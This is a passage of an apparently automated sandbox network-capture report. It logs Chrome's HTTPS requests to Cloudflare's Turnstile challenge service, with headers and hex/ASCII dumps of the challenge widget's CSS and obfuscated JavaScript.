                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                      Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d
                                                                                      Data Ascii: enge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69
                                                                                      Data Ascii: k .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-li
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69 6c 6c 3a 23
                                                                                      Data Ascii: ffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1303}to{fill:#
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b 68 65
                                                                                      Data Ascii: flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{he
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73 74 69
                                                                                      Data Ascii: .rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;justi
                                                                                      2024-11-15 17:08:51 UTC1369INData Raw: 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65 2d 6c
                                                                                      Data Ascii: text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke-l


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.1662577104.18.95.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:52 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e30d87ec8a16c3f&lang=auto HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:52 UTC331INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:08:52 GMT
                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                      Content-Length: 127756
                                                                                      Connection: close
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d883ffdde86f-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:08:52 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 48 50 55 62 6a 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.HPUbj2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                      2024-11-15 17:08:52 UTC1369INData Raw: 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32
                                                                                      Data Ascii: 20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","human_button_text":"Verify%20you%20are%20human","not_embedded":"This%20challenge%20must%2
                                                                                      2024-11-15 17:08:52 UTC1369INData Raw: 67 4b 28 33 35 30 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 32 31 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 33 32 38 29 29 2f 38 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 33 30 39 29 29 2f 39 2a 28 70 61 72 73 65 49 6e 74 28 67 4b 28 34 30 36 29 29 2f 31 30 29 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 36 34 33 30 35 36 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 31 33 32 37 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4d 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4d 3d 67 4c 2c 64 3d 7b 27 52 49 79 45 47 27 3a 66 75 6e 63
                                                                                      Data Ascii: gK(350))/6)+-parseInt(gK(1321))/7+-parseInt(gK(328))/8+parseInt(gK(1309))/9*(parseInt(gK(406))/10),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,643056),eM=this||self,eN=eM[gL(1327)],eO=function(gM,d,e,f,g){return gM=gL,d={'RIyEG':func
                                                                                      2024-11-15 17:08:52 UTC1369INData Raw: 65 74 75 72 6e 20 68 26 69 7d 2c 27 69 56 45 67 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 57 4b 75 6b 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 43 51 64 42 62 27 3a 67 4d 28 39 38 30 29 2c 27 49 50 4e 78 47 27 3a 67 4d 28 39 30 33 29 2c 27 4c 76 45 43 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 64 44 50 4b 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 41 4f 4b 5a 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 5a 65 55 6a 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 56 7a 65
                                                                                      Data Ascii: eturn h&i},'iVEgE':function(h,i){return h==i},'WKuka':function(h,i){return i!==h},'CQdBb':gM(980),'IPNxG':gM(903),'LvECA':function(h,i){return h!=i},'dDPKS':function(h,i){return h&i},'AOKZf':function(h,i){return h*i},'ZeUjc':function(h,i){return h<i},'Vze
                                                                                      2024-11-15 17:08:52 UTC1369INData Raw: 30 37 29 5d 28 30 29 29 29 7b 69 66 28 64 5b 67 50 28 31 36 37 33 29 5d 28 67 50 28 31 30 38 35 29 2c 64 5b 67 50 28 31 31 32 34 29 5d 29 29 4e 28 67 50 28 31 37 32 31 29 29 3b 65 6c 73 65 7b 66 6f 72 28 78 3d 30 3b 64 5b 67 50 28 31 36 34 30 29 5d 28 78 2c 47 29 3b 49 3c 3c 3d 31 2c 4a 3d 3d 64 5b 67 50 28 34 38 38 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 67 50 28 31 37 36 34 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 67 50 28 33 30 37 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 67 50 28 38 36 31 29 5d 28 38 2c 78 29 3b 49 3d 64 5b 67 50 28 34 35 35 29 5d 28 49 2c 31 29 7c 31 2e 37 38 26 4e 2c 64 5b 67 50 28 31 30 38 33 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 67 50 28 31 37 36 34 29 5d 28 64 5b 67
                                                                                      Data Ascii: 07)](0))){if(d[gP(1673)](gP(1085),d[gP(1124)]))N(gP(1721));else{for(x=0;d[gP(1640)](x,G);I<<=1,J==d[gP(488)](j,1)?(J=0,H[gP(1764)](o(I)),I=0):J++,x++);for(N=D[gP(307)](0),x=0;d[gP(861)](8,x);I=d[gP(455)](I,1)|1.78&N,d[gP(1083)](J,j-1)?(J=0,H[gP(1764)](d[g
                                                                                      2024-11-15 17:08:52 UTC1369INData Raw: 50 28 38 32 39 29 5d 28 67 50 28 31 35 32 33 29 2c 67 50 28 31 35 32 33 29 29 29 7b 69 66 28 53 3d 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 35 39 2e 35 33 5d 5b 33 5d 5e 73 5b 67 50 28 37 31 33 29 5d 28 74 68 69 73 2e 68 5b 73 5b 67 50 28 33 30 39 29 5d 28 35 39 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 67 50 28 33 30 37 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 35 39 2e 31 36 5d 5b 30 5d 2b 2b 29 2c 32 32 29 2b 32 35 36 26 32 35 35 5e 39 31 2c 54 3d 73 5b 67 50 28 31 34 31 31 29 5d 28 47 2c 74 68 69 73 29 2c 55 3d 74 68 69 73 2e 68 5b 73 5b 67 50 28 31 65 33 29 5d 28 35 39 2c 74 68 69 73 2e 67 29 5d 5b 34 5d 2c 31 34 38 21 3d 3d 53 29 7b 69 66 28 53 3d 3d 3d 31 33 34 29 53 3d 74 68 69 73 2e 68 5b 73 5b 67 50 28 31 65 33 29 5d 28 35 39 2c 74 68 69
                                                                                      Data Ascii: P(829)](gP(1523),gP(1523))){if(S=this.h[this.g^59.53][3]^s[gP(713)](this.h[s[gP(309)](59,this.g)][1][gP(307)](this.h[this.g^59.16][0]++),22)+256&255^91,T=s[gP(1411)](G,this),U=this.h[s[gP(1e3)](59,this.g)][4],148!==S){if(S===134)S=this.h[s[gP(1e3)](59,thi
                                                                                      2024-11-15 17:08:52 UTC1369INData Raw: 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 49 3c 3c 3d 31 2c 64 5b 67 50 28 31 33 39 39 29 5d 28 4a 2c 6a 2d 31 29 29 7b 69 66 28 64 5b 67 50 28 31 36 35 36 29 5d 28 64 5b 67 50 28 31 30 34 34 29 5d 2c 64 5b 67 50 28 31 30 34 34 29 5d 29 29 72 65 74 75 72 6e 20 47 5b 48 5d 5b 67 50 28 31 36 34 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 27 70 27 3b 65 6c 73 65 7b 48 5b 67 50 28 31 37 36 34 29 5d 28 64 5b 67 50 28 31 36 35 33 29 5d 28 6f 2c 49 29 29 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 67 50 28 38 39 34 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 67 55 2c 6a 29 7b 69 66 28 67 55 3d 67 4d 2c 64 5b 67 55 28 31 36 35 36 29 5d 28 67 55 28 39 30 33 29 2c
                                                                                      Data Ascii: J++,N>>=1,x++);for(;;)if(I<<=1,d[gP(1399)](J,j-1)){if(d[gP(1656)](d[gP(1044)],d[gP(1044)]))return G[H][gP(1642)](function(){}),'p';else{H[gP(1764)](d[gP(1653)](o,I));break}}else J++;return H[gP(894)]('')},'j':function(h,gU,j){if(gU=gM,d[gU(1656)](gU(903),
                                                                                      2024-11-15 17:08:52 UTC1369INData Raw: 46 2c 4b 29 3b 4c 3d 64 5b 67 57 28 37 39 33 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 57 28 37 34 35 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 67 57 28 38 39 34 29 5d 28 27 27 29 7d 69 66 28 30 3d 3d 78 26 26 28 78 3d 4d 61 74 68 5b 67 57 28 38 35 39 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4d 5d 29 4d 3d 73 5b 4d 5d 3b 65 6c 73 65 20 69 66 28 64 5b 67 57 28 35 35 39 29 5d 28 4d 2c 42 29 29 4d 3d 64 5b 67 57 28 32 35 34 29 5d 28 45 2c 45 5b 67 57 28 31 31 34 33 29 5d 28 30 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20
                                                                                      Data Ascii: F,K);L=d[gW(793)](G,H),H>>=1,H==0&&(H=j,G=d[gW(745)](o,I++)),J|=(0<L?1:0)*F,F<<=1);s[B++]=e(J),M=B-1,x--;break;case 2:return D[gW(894)]('')}if(0==x&&(x=Math[gW(859)](2,C),C++),s[M])M=s[M];else if(d[gW(559)](M,B))M=d[gW(254)](E,E[gW(1143)](0));else return
                                                                                      2024-11-15 17:08:52 UTC1369INData Raw: 5b 28 68 31 28 31 32 31 32 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 32 2c 48 29 7b 66 6f 72 28 68 32 3d 68 31 2c 47 5b 68 32 28 37 37 32 29 5d 28 29 2c 48 3d 30 3b 6f 5b 68 32 28 33 33 36 29 5d 28 48 2c 47 5b 68 32 28 37 33 37 29 5d 29 3b 6f 5b 68 32 28 31 33 30 33 29 5d 28 47 5b 48 5d 2c 47 5b 48 2b 31 5d 29 3f 47 5b 68 32 28 31 33 34 35 29 5d 28 6f 5b 68 32 28 39 33 37 29 5d 28 48 2c 31 29 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 31 28 31 30 30 37 29 5d 5b 68 31 28 34 38 35 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 68 31 28 33 33 36 29 5d 28 43 2c 78 5b 68 31 28 37 33 37 29 5d 29 3b 43 2b 2b 29 69 66 28 44 3d 78 5b 43 5d 2c 45 3d
                                                                                      Data Ascii: [(h1(1212))](x)):function(G,h2,H){for(h2=h1,G[h2(772)](),H=0;o[h2(336)](H,G[h2(737)]);o[h2(1303)](G[H],G[H+1])?G[h2(1345)](o[h2(937)](H,1),1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[h1(1007)][h1(485)](B),C=0;o[h1(336)](C,x[h1(737)]);C++)if(D=x[C],E=
                                                                                      2024-11-15 17:08:52 UTC1369INData Raw: 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 68 30 28 31 37 36 34 29 5d 28 47 29 7d 7d 2c 65 55 3d 67 4c 28 35 36 37 29 5b 67 4c 28 36 38 36 29 5d 28 27 3b 27 29 2c 65 56 3d 65 55 5b 67 4c 28 31 30 30 37 29 5d 5b 67 4c 28 34 38 35 29 5d 28 65 55 29 2c 65 4d 5b 67 4c 28 31 33 37 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 68 33 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 66 6f 72 28 68 33 3d 67 4c 2c 6a 3d 7b 7d 2c 6a 5b 68 33 28 31 30 34 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3d 3d 3d 76 7d 2c 6b 3d 6a 2c 6c 3d 4f 62 6a 65 63 74 5b 68 33 28 37 31 35 29 5d 28 69 29 2c 6d 3d 30 3b 6d 3c 6c 5b 68 33 28 37 33 37 29 5d 3b 6d 2b 2b 29 69 66 28 6e 3d 6c 5b 6d 5d 2c 27 66 27 3d 3d 3d 6e 26 26 28 6e 3d
                                                                                      Data Ascii: j,H)||(j[H]=[]),j[H][h0(1764)](G)}},eU=gL(567)[gL(686)](';'),eV=eU[gL(1007)][gL(485)](eU),eM[gL(1370)]=function(h,i,h3,j,k,l,m,n,o){for(h3=gL,j={},j[h3(1047)]=function(s,v){return s===v},k=j,l=Object[h3(715)](i),m=0;m<l[h3(737)];m++)if(n=l[m],'f'===n&&(n=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.1662578104.18.95.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:52 UTC742OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: image
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:52 UTC240INHTTP/1.1 200 OK
